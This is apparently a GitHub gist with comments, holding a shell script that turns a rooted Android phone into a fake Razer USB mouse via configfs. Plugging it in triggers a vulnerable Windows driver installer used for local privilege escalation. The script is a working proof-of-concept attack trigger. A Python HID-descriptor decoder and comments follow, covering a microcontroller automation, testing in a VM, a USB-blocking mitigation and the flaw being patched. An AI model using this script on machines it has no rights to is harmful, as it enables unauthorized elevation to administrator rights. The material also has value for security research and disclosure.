```sh
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1

# work as root
su

# enable CONFIGFS
mount -t configfs none /sys/kernel/config

# create gadget
mkdir /sys/kernel/config/usb_gadget/pwn_razer
cd /sys/kernel/config/usb_gadget/pwn_razer

# set vendor (Razer) & product id
# for a list of suitable devices see the inf files in the driver cab archive
# (feel free to change the product id)
echo 0x1532 > idVendor
echo 0x023e > idProduct

# set USB version 2
echo 0x0200 > bcdUSB

# set device class to Misc / Interface Association Descriptor
echo 0xEF > bDeviceClass
echo 0x02 > bDeviceSubClass
echo 0x01 > bDeviceProtocol

# set some info strings
mkdir -p strings/0x409
echo "deadbeefdeadbeef" > strings/0x409/serialnumber
echo "an0n" > strings/0x409/manufacturer
echo "fake Razer device" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "basic Multi-function device with single TLC (MI_02)" > configs/c.1/strings/0x409/configuration

# set some fake power config values
echo 250 > configs/c.1/MaxPower
echo 0x80 > configs/c.1/bmAttributes

# add 3 mouse HID devices (protocol 2) with a basic HID report descriptor
for i in g1 g2 g3 ; do
    mkdir -p functions/hid.${i}
    echo 2 > functions/hid.${i}/protocol
    echo 6 > functions/hid.${i}/report_length
    echo BQEJAqEBCQGhAIUBBQkZASkDFQAlAZUDdQGBApUBdQWBAwUBCTAJMRWBJX91CJUCgQaVAnUIgQHAwAUBCQKhAQkBoQCFAgUJGQEpAxUAJQGVA3UBgQKVAXUFgQEFAQkwCTEVACb/f5UCdRCBAsDA | base64 -d > functions/hid.${i}/report_desc
done

# activate the HID devices
for i in g1 g2 g3 ; do
    ln -s functions/hid.${i} configs/c.1/
done

# bind (for activating, disable default gadget and enable the new one)
# might need to be changed (if the active gadget is not in ../g1)
echo "" > ../g1/UDC ; getprop sys.usb.controller > UDC
```
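As an added example (not part of the gist), a Python decoder for the HID report descriptor the script pipes into `report_desc`: it lists the short items with their collection nesting and computes the size of each Input report, which is where the `echo 6 > report_length` value comes from. The base64 string is copied verbatim from the script above; the item encoding follows USB HID 1.11 section 6.2.2, and only the tags this descriptor uses (plus the other Main items) are named.

```python
import base64

# Descriptor copied verbatim from the gist (the blob piped into functions/hid.*/report_desc).
REPORT_DESC_B64 = ("BQEJAqEBCQGhAIUBBQkZASkDFQAlAZUDdQGBApUBdQWBAwUBCTAJMRWBJX91CJUC"
                   "gQaVAnUIgQHAwAUBCQKhAQkBoQCFAgUJGQEpAxUAJQGVA3UBgQKVAXUFgQEFAQkw"
                   "CTEVACb/f5UCdRCBAsDA")
DESC = base64.b64decode(REPORT_DESC_B64)
# Short-item names keyed by (bType, bTag); unlisted tags are reported as Reserved, not skipped.
NAMES = {(0, 0x8): "Input", (0, 0x9): "Output", (0, 0xA): "Collection", (0, 0xB): "Feature",
         (0, 0xC): "End Collection", (1, 0x0): "Usage Page", (1, 0x1): "Logical Minimum",
         (1, 0x2): "Logical Maximum", (1, 0x7): "Report Size", (1, 0x8): "Report ID",
         (1, 0x9): "Report Count", (2, 0x0): "Usage", (2, 0x1): "Usage Minimum",
         (2, 0x2): "Usage Maximum"}
SIGNED = {"Logical Minimum", "Logical Maximum"}  # the only signed items used here

def parse_items(desc):
    """Decode short items into (name, value, depth); rejects long items and bad nesting."""
    items, depth, i = [], 0, 0
    while i < len(desc):
        prefix = desc[i]
        if prefix == 0xFE:  # long-item prefix; never produced by this gadget
            raise ValueError("long item at offset %d" % i)
        size = (0, 1, 2, 4)[prefix & 0x3]
        name = NAMES.get(((prefix >> 2) & 0x3, prefix >> 4), "Reserved(0x%02X)" % prefix)
        data = desc[i + 1:i + 1 + size]
        if len(data) != size:
            raise ValueError("truncated item at offset %d" % i)
        value = int.from_bytes(data, "little", signed=name in SIGNED) if size else None
        if name == "End Collection":
            depth -= 1
        items.append((name, value, depth))
        if name == "Collection":
            depth += 1
        i += 1 + size
    if depth:
        raise ValueError("unbalanced collections")
    return items

def input_report_bytes(desc):
    """Size of each Input report in bytes, including the Report ID prefix byte when one is set."""
    state = {"Report Size": 0, "Report Count": 0, "Report ID": 0}
    bits = {}
    for name, value, _ in parse_items(desc):
        if name in state:  # global items persist until overwritten
            state[name] = value
        elif name == "Input":  # Main item consumes the current Size x Count bits
            rid = state["Report ID"]
            bits[rid] = bits.get(rid, 0) + state["Report Size"] * state["Report Count"]
    return {r: (b + 7) // 8 + (1 if r else 0) for r, b in bits.items()}
```

Both application collections describe a Generic Desktop / Mouse with 3 buttons and X/Y axes (8-bit relative for report ID 1, 16-bit absolute for report ID 2), and each Input report is 40 bits plus the ID byte, i.e. 6 bytes.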
Got my microcontroller working to trigger + automate this
pwn.mp4
awesome! :)
Any way I can test this out on a VM without it auto-executing on my PC?
Should be able to use a USB filter in the VM's USB settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host, e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices for USB\VID_1532
Thank you!!
😮
Nice!!! Can you share the code?
Sorry about the delay.
https://github.com/synap5e/razor-eop-XIAO
I know it's been a while, but is this still supposed to work? I know the vulnerability is patched by now, but I can't even make the co-installer run.